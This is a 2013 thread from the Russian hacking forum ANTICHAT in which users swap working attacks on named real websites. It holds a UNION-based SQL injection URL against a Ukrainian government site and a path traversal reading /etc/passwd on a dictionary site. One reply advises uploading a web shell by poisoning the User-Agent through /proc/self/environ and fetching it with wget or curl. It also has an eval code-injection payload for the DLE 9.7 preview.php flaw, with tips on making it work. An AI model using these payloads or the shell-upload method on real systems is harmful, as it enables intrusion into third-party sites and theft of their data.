ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

31.01.2013, 01:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 195266
Репутация:
53
|
|
Сообщение от LelouchMe
LelouchMe said:
Да, кстати, а кто подскажет что это такое...?)
Вроде как не слепая... С такой ещё не стыкался...
http://www.rada-poltava.gov.ua/news/1'00000000'/
http://www.rada-poltava.gov.ua/news/-25398276'union select 1,2,concat_ws(0x3a, user(), version()),4-- /
|
|
|
|

01.02.2013, 20:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 46989
Репутация:
20
|
|
http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?
|
|
|
|

01.02.2013, 21:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 28262
Репутация:
23
|
|
Del msg
|
|
|
|

01.02.2013, 21:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 28262
Репутация:
23
|
|
Сообщение от Vip77
Vip77 said:
http://www.merriam-webster.com/cgi-bin/form.cgi?type=../../../etc/passwd%00 можно чтонить еще сделать?
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
|
|
|
|

01.02.2013, 23:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 15180
Репутация:
0
|
|
Сообщение от Zed0x
Zed0x said:
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
А что делать, если /proc/self/environ выглядит так:
NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULN ULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNUL NULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNULNU LNUL
Т.е., прочитать я его могу, но, кажется, что-то с ним не так
|
|
|
|

02.02.2013, 03:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 46989
Репутация:
20
|
|
Сообщение от Zed0x
Zed0x said:
заливай шелл через /proc/self/environ, он у тебя открыт на чтение. Там логируется User-Agent, изменяй его и заливай через wget, curl или php функции file_put_contents или copy. Удачи! ;-)
там пхп не установлен походу
|
|
|
|

02.02.2013, 19:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 28262
Репутация:
23
|
|
В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php
http://www.exploit-db.com/exploits/24444/
Смысл в том, что он под метасплоит.
Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]catlist[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]brainyfuck123[/COLOR][COLOR="#DD0000"]')||eval("echo 123;");//[/COLOR][/COLOR]
Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.
Подскажите, что делаю не так
UPD: Форум почему-то убирает кавычку перед строкой brainyfuck123'), знайте что она там есть
|
|
|
|

03.02.2013, 00:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 6020
Репутация:
0
|
|
Код:
Code:
http://www.golowar.ru/news.php?id=67&page='
пишет:
Сообщение от None
SELECT c.*, ch.gmt, u.username, u.moder, ch.race FROM comments c LEFT JOIN `character` ch ON ch.id = c.author LEFT JOIN `users` u ON u.id = c.author WHERE c.article_id = "67" LIMIT -10,10 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10,10' at line 1
Проверил сайт, можно ли считать это уязвимостью?
Как дальше её раскрутить чтоб исправить!
|
|
|
|

03.02.2013, 13:15
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от Zed0x
Zed0x said:
В DLE 9.7 несколько дней назад нашли удаленное выполнение php кода, уязвимость в /engine/preview.php
http://www.exploit-db.com/exploits/24444/
Смысл в том, что он под метасплоит.
Хочу работать руками, убрал метосплоитовские коды и получился POST запрос вида:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]catlist[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]brainyfuck123[/COLOR][COLOR="#DD0000"]')||eval("echo 123;");//[/COLOR][/COLOR]
Отправляю его на /engine/preview.php, но результата ноль, показывается пустой новостной материал.
Подскажите, что делаю не так
UPD:
Форум почему-то убирает кавычку перед строкой
brainyfuck123')
, знайте что она там есть
Это работает только в том случае, если в шаблонах есть тег catlist или not-catlist.
|
|
|

03.02.2013, 15:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 28262
Репутация:
23
|
|
del msg
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|